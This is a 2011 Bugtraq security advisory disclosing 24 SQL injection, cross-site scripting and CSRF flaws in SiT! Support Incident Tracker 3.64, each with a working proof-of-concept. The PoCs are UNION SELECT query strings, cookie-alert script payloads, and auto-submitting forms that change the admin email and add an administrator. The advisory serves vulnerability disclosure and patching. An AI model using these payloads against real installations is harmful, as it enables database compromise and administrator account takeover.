[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Multiple vulnerabilities in SiT! Support Incident Tracker
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Multiple vulnerabilities in SiT! Support Incident Tracker
- From: advisory@xxxxxxxxxxx
- Date: Wed, 14 Sep 2011 09:24:44 +0200 (CEST)
Vulnerability ID: HTB23043
Reference:
https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_sit_support_incident_tracker.html
Product: SiT! Support Incident Tracker
Vendor: The Support Incident Tracker Project ( http://sitracker.org/ )
Vulnerable Version: 3.64 and probably prior
Tested Version: 3.64
Vendor Notification: 24 August 2011
Vulnerability Type: SQL Injection, XSS, CSRF
Status: Fixed by Vendor
Risk level: High
Credit: High-Tech Bridge SA Security Research Lab (
https://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple
vulnerabilities in SiT! Support Incident Tracker, which can be exploited to
perform SQL injection, cross-site scripting, cross-site request forgery attacks.
1) Input passed via the "start" GET parameter to /portal/kb.php is not properly
sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/portal/kb.php?start=SQL_CODE_HERE
2) Input passed via the "contractid" GET parameter to contract_add_service.php
is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/contract_add_service.php?contractid=1%20union%20%28select%20min%28@a:=1%29from%20%28select%201%20union%20select%202%29k%20group%20by%20%28select%20concat%28@@version,0x0,@a:=%28@a%2B1%29%2%29%29%29%20+--+
3) Input passed via the "mode" GET parameter to contact_support.php is not
properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user
browser session in context of affected website.
The following PoC code is available:
http://[host]/contact_support.php?mode=1%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
4) Input passed via the "contractid" GET parameter to contract_add_service.php
is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user
browser session in context of affected website.
The following PoC code is available:
http://[host]/contract_add_service.php?contractid=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
5) Input passed via the "user" GET parameter to edit_backup_users.php is not
properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user
browser session in context of affected website.
The following PoC code is available:
http://[host]/edit_backup_users.php?user=%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
6) Input passed via the "id" GET parameter to edit_escalation_path.php is not
properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/edit_escalation_path.php?id=-1%20union%20select%201,version%28%29,user%28%29,4,5,6,7,8,9
7) Input passed via the "id" GET parameter to edit_escalation_path.php is not
properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user
browser session in context of affected website.
The following PoC code is available:
http://[host]/edit_escalation_path.php?id=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
8) Input passed via the Referer parameter to forgotpwd.php is not properly
sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user
browser session in context of affected website.
The following PoC code is available:
GET /forgotpwd.php?userid=1&action=sendpwd HTTP/1.1
Referer: '<script>alert(document.cookie);</script>
9) Input passed via the "unlock" & "lock" GET parameters to holding_queue.php
is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/holding_queue.php?unlock=%27SQL_CODE_HERE
http://[host]/holding_queue.php?lock=%27SQL_CODE_HERE
10) Input passed via the "selected" POST parameter to holding_queue.php is not
properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
<form action="http://[host]/holding_queue.php" method="post">
<input type="hidden" name="selected[]" value="'SQL_CODE_HERE">
<input type="submit" value="exploit">
</form>
11) Input passed via the "action" GET parameter to inbox.php is not properly
sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user
browser session in context of affected website.
The following PoC code is available:
http://[host]/inbox.php?action=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
12) Input passed via the "search_string" GET parameter to incident_add.php
(when "action" is set to "findcontact") is not properly sanitised before being
returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user
browser session in context of affected website.
The following PoC code is available:
http://[host]/incident_add.php?action=findcontact&search_string=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
13) Input passed via the "inc" POST parameter to report_customers.php (when
"mode" is set to "report") is not properly sanitised before being used in a SQL
query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
<form action="http://[host]/report_customers.php?mode=report" method="post">
<input type="hidden" name="inc[]" value="-1) union select
1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56
-- ">
<input type="hidden" name="output" value="screen">
<input type="submit" value="exploit">
</form>
14) Input passed via the "table1" POST parameter to report_customers.php is not
properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user
browser session in context of affected website.
The following PoC code is available:
<form action="http://[host]/report_customers.php" method="post">
<input type="hidden" name="table1"
value="'><script>alert(document.cookie);</script>">
<input type="submit" value="exploit">
</form>
15) Input passed via the "table1" POST parameter to
report_incidents_by_engineer.php is not properly sanitised before being
returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user
browser session in context of affected website.
The following PoC code is available:
<form action="http://[host]/report_incidents_by_engineer.php" method="post">
<input type="hidden" name="table1"
value="'><script>alert(document.cookie);</script>">
<input type="submit" value="exploit">
</form>
16) Input passed via the "table1" POST parameter to
report_incidents_by_site.php is not properly sanitised before being returned to
the user.
This can be exploited to execute arbitrary HTML and script code in a user
browser session in context of affected website.
The following PoC code is available:
<form action="http://[host]/report_incidents_by_site.php" method="post">
<input type="hidden" name="table1"
value="'><script>alert(document.cookie);</script>">
<input type="submit" value="exploit">
</form>
17) Input passed via the "inc" POST parameter to report_incidents_by_site.php
(when "mode" is set to "report") is not properly sanitised before being used in
a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
<form action="http://[host]/report_incidents_by_site.php?mode=report"
method="post">
<input type="hidden" name="inc[]" value="-1) union select
version(),2,3,4,5,6,7,8,9,10 -- ">
<input type="hidden" name="output" value="screen">
<input type="submit" value="exploit">
</form>
18) Input passed via the "startdate" & "enddate" GET parameters to
report_incidents_by_vendor.php (when "mode" not empty) is not properly
sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user
browser session in context of affected website.
The following PoC code is available:
http://[host]/report_incidents_by_vendor.php?mode=1&startdate=%3Cscript%3Ealert%281%29;%3C/script%3E&enddate=%3Cscript%3Ealert%282%29;%3C/script%3E
19) Input passed via the "table1" POST parameter to report_marketing.php is not
properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user
browser session in context of affected website.
The following PoC code is available:
<form action="http://[host]/report_marketing.php" method="post">
<input type="hidden" name="table1"
value="'><script>alert(document.cookie);</script>">
<input type="submit" value="exploit">
</form>
20) Input passed via the "start" GET parameter to search.php is not properly
sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/search.php?q=123&domain=incidents&start=SQL_CODE_HERE
21) Input passed via the "sites" GET parameter to transactions.php is not
properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/transactions.php?sites[]=1%20union%20select%201,2,3,4,5,6,7,8,version%28%29,10,11,12,13,14,15,16%20+--+
22) Input passed via the Referer parameter to billable_incidents.php (when
"mode" is set to "approvalpage" & "output" is set to "html") is not properly
sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user
browser session in context of affected website.
The following PoC code is available:
GET /billable_incidents.php?mode=approvalpage&output=html HTTP/1.1
Referer: '><script>alert(document.cookie);</script>
23) Input passed via the Referer parameter to transactions.php (when "display"
is set to "html") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user
browser session in context of affected website.
The following PoC code is available:
GET /transactions.php?display=html HTTP/1.1
Referer: '><script>alert(document.cookie);</script>
24) The application allows users to perform certain actions via HTTP requests
without making proper validity checks to verify the requests.
This can be exploited to e.g. change administrator email, add new new
administrator or conduct script insertion attacks by tricking an administrator
into visiting a malicious web site while being logged-in to the application.
The following PoC is available:
<form action="http://[host]/user_profile_edit.php" method="post">
<input type="hidden" name="realname" value="realname">
<input type="hidden" name="mode" value="save">
<input type="hidden" name="submit" value="Save">
<input type="hidden" name="email" value="testemail@xxxxxxxx">
<input type="hidden" name="userid" value="1">
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>
<form action="http://[host]/user_add.php" method="post">
<input type="hidden" name="realname" value="testuser">
<input type="hidden" name="username" value="testuser">
<input type="hidden" name="password" value="password">
<input type="hidden" name="groupid" value="0">
<input type="hidden" name="roleid" value="1">
<input type="hidden" name="jobtitle" value="jobtitle">
<input type="hidden" name="email" value="email@xxxxxxxxx">
<input type="hidden" name="submit" value="Add User">
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>
--------------------------------
Solution: Upgrade to the most recent version